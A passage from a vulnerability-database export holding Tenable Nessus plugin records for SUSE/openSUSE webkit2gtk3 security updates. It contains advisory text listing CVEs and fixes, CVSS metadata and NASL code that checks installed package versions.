remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandled\n an unset pageURL, leading to an application crash\n (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS)\n vulnerability allowed remote attackers to inject\n arbitrary web script or HTML via a crafted URL\n (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit\n unexpectedly failed to use system proxy settings for\n WebSocket connections. As a result, users could be\n deanonymized by crafted websites via a WebSocket\n connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit\n failed to perform TLS certificate verification for\n WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on\n an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio\n (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on\n GTlsConnection::accept-certificate to finish the load\n earlier in case of errors.\n\n - Properly close the connection to the nested wayland\n compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some\n websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quiks to fix Outlook.com and\n Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot allocate\n virtual memory.\n\n - Add missing WebKitWebProcessEnumTypes.h to\n webkit-web-extension.h.\n\n - Improve web process memory monitor thresholds.\n\n - Fix a web process crash when the web view is created and\n destroyed quickly.\n\n - Fix a network process crash when load is cancelled while\n searching for stored HTTP auth credentials.\n\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and\n ENABLE_XSLT are disabled.\n\n - New API to retrieve and delete cookies with\n WebKitCookieManager.\n\n - New web process API to detect when form is submitted via\n JavaScript.\n\n - Several improvements and fixes in the touch/gestures\n support.\n\n - Support for the &ldquo;system&rdquo; CSS font family.\n\n - Complex text rendering improvements and fixes.\n\n - More complete and spec compliant WebDriver\n implementation.\n\n - Ensure DNS prefetching cannot be re-enabled if disabled\n by settings.\n\n - Fix seek sometimes not working.\n\n - Fix rendering of emojis that were using the wrong scale\n factor in some cases.\n\n - Fix rendering of combining enclosed keycap.\n\n - Fix rendering scale of some layers in HiDPI.\n\n - Fix a crash in Wayland when closing the web view.\n\n - Fix crashes upower crashes when running inside a chroot\n or on systems with broken dbus/upower.\n\n - Fix memory leaks in GStreamer media backend when using\n GStreamer 1.14.\n\n - Fix several crashes and rendering issues.\n\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build\n with asan support.\n\n - Fix a crash a under Wayland when using mesa software\n rasterization.\n\n - Make fullscreen video work again.\n\n - Fix handling of missing GStreamer elements.\n\n - Fix rendering when webm video is played twice.\n\n - Fix kinetic scrolling sometimes jumping around.\n\n - Fix build with ICU configured without collation support.\n\n - WebSockets use system proxy settings now (requires\n libsoup 2.61.90).\n\n - Show the context menu on long-press gesture.\n\n - Add support for Shift + mouse scroll to scroll\n horizontally.\n\n - Fix zoom gesture to actually zoom instead of changing\n the page scale.\n\n - Implement support for Graphics ARIA roles.\n\n - Make sleep inhibitors work under Flatpak.\n\n - Add get element CSS value command to WebDriver.\n\n - Fix a crash aftter a swipe gesture.\n\n - Fix several crashes and rendering issues.\n\n - Fix crashes due to duplicated symbols in\n libjavascriptcoregtk and libwebkit2gtk.\n\n - Fix parsing of timeout values in WebDriver.\n\n - Implement get timeouts command in WebDriver.\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Fix several crashes and rendering issues.\n\n - Add web process API to detect when form is submitted via\n JavaScript.\n\n - Add new API to replace\n webkit_form_submission_request_get_text_fields() that is\n now deprecated.\n\n - Add WebKitWebView::web-process-terminated signal and\n deprecate web-process-crashed.\n\n - Fix rendering issues when editing text areas.\n\n - Use FastMalloc based GstAllocator for GStreamer.\n\n - Fix web process crash at startup in bmalloc.\n\n - Fix several memory leaks in GStreamer media backend.\n\n - WebKitWebDriver process no longer links to\n libjavascriptcoregtk.\n\n - Fix several crashes and rendering issues.\n\n - Add new API to add, retrieve and delete cookies via\n WebKitCookieManager.\n\n - Add functions to WebSettings to convert font sizes\n between points and pixels.\n\n - Ensure cookie operations take effect when they happen\n before a web process has been spawned.\n\n - Automatically adjust font size when\n GtkSettings:gtk-xft-dpi changes.\n\n - Add initial resource load statistics support.\n\n - Add API to expose availability of certain editing\n commands in WebKitEditorState.\n\n - Add API to query whether a WebKitNavigationAction is a\n redirect or not.\n\n - Improve complex text rendering.\n\n - Add support for the 'system' CSS font family.\n\n - Disable USE_GSTREAMER_GL\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1075775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1077535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1088182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1088932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1101999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104169\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.20.3-11.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:56:07", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\nCVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs (boo#1101999)\n\nCVE-2017-13884: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-13885: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7153: An unspecified issue allowed remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted website that sends a 401 Unauthorized redirect (bsc#1077535).\n\nCVE-2017-7160: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7161: An unspecified issue allowed remote attackers to execute arbitrary code via special characters that trigger command injection (bsc#1075775, bsc#1077535).\n\nCVE-2017-7165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4088: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4096: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4200: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers a WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\nCVE-2018-4204: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092279).\n\nCVE-2018-4101: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit' component allowed attackers to trigger an assertion failure by leveraging improper array indexing (bsc#1088182)\n\nCVE-2018-4114: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4117: An unspecified issue allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1088182, bsc#1102530).\n\nCVE-2018-4118: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4119: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4120: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4121: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092278).\n\nCVE-2018-4122: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4125: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4127: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4128: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4129: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4146: An unspecified issue allowed attackers to cause a denial of service (memory corruption) via a crafted website (bsc#1088182).\n\nCVE-2018-4161: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4162: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4163: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693)\n\nCVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693)\n\nCVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693)\n\nCVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693)\n\nCVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4246: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages type confusion (bsc#1104169)\n\nCVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL, leading to an application crash (bsc#1095611)\n\nCVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed remote attackers to inject arbitrary web script or HTML via a crafted URL (bsc#1088182).\n\nCVE-2018-11713: The libsoup network backend of WebKit unexpectedly failed to use system proxy settings for WebSocket connections. As a result, users could be deanonymized by crafted websites via a WebSocket connection (bsc#1096060).\n\nCVE-2018-11712: The libsoup network backend of WebKit failed to perform TLS certificate verification for WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues: Fixed a crash when atk_object_ref_state_set is called on an AtkObject that's being destroyed (bsc#1088932).\n\nFixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\nDisable Gigacage if mmap fails to allocate in Linux.\n\nAdd user agent quirk for paypal website.\n\nProperly detect compiler flags, needed libs, and fallbacks for usage of 64-bit atomic operations.\n\nFix a network process crash when trying to get cookies of about:blank page.\n\nFix UI process crash when closing the window under Wayland.\n\nFix several crashes and rendering issues.\n\nDo TLS error checking on GTlsConnection::accept-certificate to finish the load earlier in case of errors.\n\nProperly close the connection to the nested wayland compositor in the Web Process.\n\nAvoid painting backing stores for zero-opacity layers.\n\nFix downloads started by context menu failing in some websites due to missing user agent HTTP header.\n\nFix video unpause when GStreamerGL is disabled.\n\nFix several GObject introspection annotations.\n\nUpdate user agent quiks to fix Outlook.com and Chase.com.\n\nFix several crashes and rendering issues.\n\nImprove error message when Gigacage cannot allocate virtual memory.\n\nAdd missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\nImprove web process memory monitor thresholds.\n\nFix a web process crash when the web view is created and destroyed quickly.\n\nFix a network process crash when load is cancelled while searching for stored HTTP auth credentials.\n\nFix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are disabled.\n\nNew API to retrieve and delete cookies with WebKitCookieManager.\n\nNew web process API to detect when form is submitted via JavaScript.\n\nSeveral improvements and fixes in the touch/gestures support.\n\nSupport for the &Atilde;&cent;&Acirc;&#128;&Acirc;&#156;system&Atilde;&cent;&Acirc;&#1 28;&Acirc;&#157; CSS font family.\n\nComplex text rendering improvements and fixes.\n\nMore complete and spec compliant WebDriver implementation.\n\nEnsure DNS prefetching cannot be re-enabled if disabled by settings.\n\nFix seek sometimes not working.\n\nFix rendering of emojis that were using the wrong scale factor in some cases.\n\nFix rendering of combining enclosed keycap.\n\nFix rendering scale of some layers in HiDPI.\n\nFix a crash in Wayland when closing the web view.\n\nFix crashes upower crashes when running inside a chroot or on systems with broken dbus/upower.\n\nFix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\nFix several crashes and rendering issues.\n\nAdd ENABLE_ADDRESS_SANITIZER to make it easier to build with asan support.\n\nFix a crash a under Wayland when using mesa software rasterization.\n\nMake fullscreen video work again.\n\nFix handling of missing GStreamer elements.\n\nFix rendering when webm video is played twice.\n\nFix kinetic scrolling sometimes jumping around.\n\nFix build with ICU configured without collation support.\n\nWebSockets use system proxy settings now (requires libsoup 2.61.90).\n\nShow the context menu on long-press gesture.\n\nAdd support for Shift + mouse scroll to scroll horizontally.\n\nFix zoom gesture to actually zoom instead of changing the page scale.\n\nImplement support for Graphics ARIA roles.\n\nMake sleep inhibitors work under Flatpak.\n\nAdd get element CSS value command to WebDriver.\n\nFix a crash aftter a swipe gesture.\n\nFix several crashes and rendering issues.\n\nFix crashes due to duplicated symbols in libjavascriptcoregtk and libwebkit2gtk.\n\nFix parsing of timeout values in WebDriver.\n\nImplement get timeouts command in WebDriver.\n\nFix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\nFix several crashes and rendering issues.\n\nAdd web process API to detect when form is submitted via JavaScript.\n\nAdd new API to replace webkit_form_submission_request_get_text_fields() that is now deprecated.\n\nAdd WebKitWebView::web-process-terminated signal and deprecate web-process-crashed.\n\nFix rendering issues when editing text areas.\n\nUse FastMalloc based GstAllocator for GStreamer.\n\nFix web process crash at startup in bmalloc.\n\nFix several memory leaks in GStreamer media backend.\n\nWebKitWebDriver process no longer links to libjavascriptcoregtk.\n\nFix several crashes and rendering issues.\n\nAdd new API to add, retrieve and delete cookies via WebKitCookieManager.\n\nAdd functions to WebSettings to convert font sizes between points and pixels.\n\nEnsure cookie operations take effect when they happen before a web process has been spawned.\n\nAutomatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\nAdd initial resource load statistics support.\n\nAdd API to expose availability of certain editing commands in WebKitEditorState.\n\nAdd API to query whether a WebKitNavigationAction is a redirect or not.\n\nImprove complex text rendering.\n\nAdd support for the 'system' CSS font family.\n\nDisable USE_GSTREAMER_GL\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-25T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2018:3387-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-11646", "CVE-2018-11712", "CVE-2018-11713", "CVE-2018-12911", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4204", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2019-09-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-3387-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118389", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3387-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118389);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2018:3387-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\nCVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n(boo#1101999)\n\nCVE-2017-13884: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-13885: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory 